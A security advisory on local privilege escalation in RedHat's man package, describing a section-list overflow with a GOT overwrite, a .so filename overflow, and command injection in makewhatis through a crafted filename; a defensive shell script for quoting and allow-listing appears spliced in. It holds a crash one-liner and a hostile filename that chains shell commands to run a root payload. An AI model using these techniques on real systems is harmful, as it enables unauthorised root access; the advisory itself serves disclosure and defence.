COMMAND
man
SYSTEMS AFFECTED
man 1.5h10 + man 1.5i-4 (RedHat 7.0, 7.1)
PROBLEM
zen-parse found the following. This advisory is also stored, along
with the exploits, at http://generic.labs.pulltheplug.com/zen/ as
man.txt. This is a bug in the man package, not the man-db package.
Multiple versions of man are affected. The version numbers given
are RedHat rpm version numbers. Just because a version is not
listed here does not mean it is not vulnerable. The main
problem, which allows root, is in the /usr/sbin/makewhatis file.
If there is no checking for shell metacharacters in files being
used as arguments, it is possible there is a problem.
man-1.5h1
=========
man -S `perl -e 'print ":" x 100'` ls
will cause a Segmentation fault error, due to incorrect bounds
checking in the array used to hold the section list. Stored after
the tmp_section_list structure are the heads of a couple of linked
lists, cat_list and man_list, which hold the names of the files
already shown.
By using a pointer to strcpy() (the last entry in the GOT) as the
'next' pointer, it is possible to overwrite the address of the
library function 'strcpy' with a newly malloc()ed string
containing the name of the file just viewed. The string will
then be executed instead of strcpy.
(strcpy() is used because it has a NULL after it in the GOT,
which looks to man to mean "This is the tail of the linked list",
and because it gets called at the appropriate time.)
Exploiting this gives you gid man. (Elevation of gid man -> root
is dealt with after the next section.)
man-1.5i-4
==========
This version does not have the -S problem. It does however have
an overflow in the handling of .so (sourced) man pages. If a
manpage has
.so something
as the first line, ultimate_source() attempts to find the file
referred to by the something.
If it is compressed, it uses my_popen(), a wrapped version of
popen() that drops privileges to the user's, to read the contents
and check that file for a .so line as well. Under certain
circumstances the filename will increase in length.
As there is no checking for the existence of the file other than
the return value from the popen() call, it is possible, by
embedding shell metacharacters in the filename to be opened, to
trick it into thinking it succeeded.
The same commands that fool it into thinking it succeeded can
return the name of the next file to look at. This can be done
several times, until the overflow has reached the desired point.
(ultname is 8192 bytes long, but due to the layout of the
variables in memory, it needs an overflow of more than double that
in order to affect the list structure used in the previous
exploit, which is what zen's exploit does.)
Successful exploitation will result in gid man.
/usr/sbin/makewhatis
====================
...
function readline() {
    if (use_zcat) {
        result = (pipe_cmd | getline);
        if (result < 0) {
            print "Pipe error: " pipe_cmd " " ERRNO > "/dev/stderr";
        }
...
    if (use_zcat) {
        pipe_cmd = "zcat " filename;
...
Imagine a file called:
"ls.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.;gimmeroot;echo .1.gz"
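The defensive counterpart to the makewhatis excerpt above, added here as an example and not taken from the advisory or from the man package: an allow-list check on man page filenames plus single-quote escaping of the command string, with printf standing in for zcat so the argument the child shell received can be inspected. The function names and the shortened hostile filename are constructed for this example.

```shell
#!/bin/sh
# Added example, not code from the advisory or from the man package: two
# defensive checks for the makewhatis pattern  pipe_cmd = "zcat " filename,
# where the filename reaches sh -c unvalidated and unquoted.

# 1. Allow-list: a man page filename needs only letters, digits, '.', '_',
#    '+' and '-'. Anything else (';', space, '`', '$', quotes) is rejected.
is_safe_manpage_name() {
    case "$1" in
        "")                   return 1 ;;
        *[!A-Za-z0-9._+-]*)   return 1 ;;
        *)                    return 0 ;;
    esac
}

# 2. Quoting: wrap the name in single quotes and turn every embedded ' into
#    '\'' so sh -c sees exactly one literal argument (the fallback if a caller
#    skips the allow-list). Names containing a newline are out of scope here.
shell_quote() {
    printf "'%s'" "$(printf '%s' "$1" | sed "s/'/'\\\\''/g")"
}

# Build a command string the way the awk code does and run it through sh -c,
# but with printf standing in for zcat, so we can see the single argument the
# child actually received. Prints that argument.
arg_seen_by_shell() {
    sh -c "printf '%s\n' $(shell_quote "$1")"
}

# Constructed sample names: a legitimate page and a shortened form of the
# hostile name from the advisory above.
GOOD='ls.1.gz'
BAD='ls.1.gz;cd ..;echo .1.gz'

for name in "$GOOD" "$BAD"; do
    if is_safe_manpage_name "$name"; then
        echo "accepted by allow-list: $name"
    else
        echo "rejected by allow-list: $name"
    fi
    # Even the rejected name comes back intact: nothing between the ';' ran.
    echo "argument the shell saw:  $(arg_seen_by_shell "$name")"
done
```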
Mimed exploits:
SOLUTION
For more info:
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=19351
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=40400
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=41805
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=42450
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=43213